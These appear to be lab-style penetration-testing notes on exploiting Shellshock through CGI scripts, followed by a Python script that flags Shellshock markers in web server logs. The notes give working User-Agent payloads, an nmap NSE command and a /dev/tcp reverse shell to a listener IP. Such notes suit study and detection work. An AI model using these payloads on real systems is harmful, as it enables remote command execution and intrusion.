ShellShock

ShellShocked: if the web server exposes a CGI script (cgi-bin is the directory where code that interfaces a website with some other service is placed) and the host runs an old version of bash, it is possibly vulnerable. In the sample below the file was called user.sh.

Checking if vulnerable: proxy the request through Burp, then change the User-Agent header.

Direct test:
() { :; };/bin/echo; echo *hello*
(also try without /bin/)

Blind test (basically see whether this makes the response about 10 seconds slower than normal):
() { :; }; sleep 10
You may also have to try variations of this if the server is confused by the first form:
() { :;}; echo; sleep 10
() { :;}; /bin/echo; sleep 10

Manual exploit: open up a nc listener, then put the string below in the User-Agent:
() { :; }; echo; bash -i >& /dev/tcp/10.10.15.135/8081 0>&1
or try:
() { :; }; echo; /bin/bash -c ls

Automated nse script (also tries several other headers such as Cookie and Referer):
# locate nse | grep shellshock
# nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56
It would be good to proxy this through Burp: use cmd=ls against 127.0.0.1 with -p8081, with a Burp listener on that local port forwarding to the site. Then find the shellshock request in the proxy history and send it to Repeater.

Sample of what it sends:

sample modification to try if its not working:
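The tests above all share one tell-tale marker: a header value that begins with a bash function definition (`() {` ... `};`) followed by extra commands. That marker is what a defender looks for in web server logs or a WAF rule. The following is an added detection example, not code from the original notes: it parses a few constructed Apache combined-format log lines (not from any real server) and flags requests whose User-Agent, Referer or request line carry the Shellshock prefix, in any of the spacing variants listed above.

```python
import re
from typing import Dict, List

# The Shellshock marker: "() {" , a function body, "}" and a trailing ";".
# Tolerates the spacing variants seen in the tests above ("() { :; };" and "() { :;};").
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines (hypothetical hosts and times, not a real capture).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 612 "-" "() { :; }; /bin/echo; echo hello"
10.0.0.6 - - [10/Oct/2023:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 612 "() { :;}; sleep 10" "curl/7.68.0"
"""


def request_path(req: str) -> str:
    """Return the path component of an HTTP request line ("GET /x HTTP/1.1" -> "/x")."""
    parts = req.split()
    return parts[1] if len(parts) > 1 else ""


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one hit per log line whose Referer, User-Agent or request line
    contains the Shellshock function-definition marker."""
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        # Check the fields an attacker controls; stop at the first one that matches.
        for field in ("referer", "ua", "req"):
            value = m.group(field)
            if SHELLSHOCK_RE.search(value):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "path": request_path(m.group("req")),
                    "field": field,
                    "payload": value,
                })
                break
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['path']} via {hit['field']}: {hit['payload']}")
```

The same regex can be applied to other attacker-controlled headers (Cookie, custom headers) if the server logs them, which matters because the nse script mentioned above tries those too; a match on a request to a cgi-bin path is worth an alert even when the response status is 200, since a successful Shellshock request looks like a normal page load to the server.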
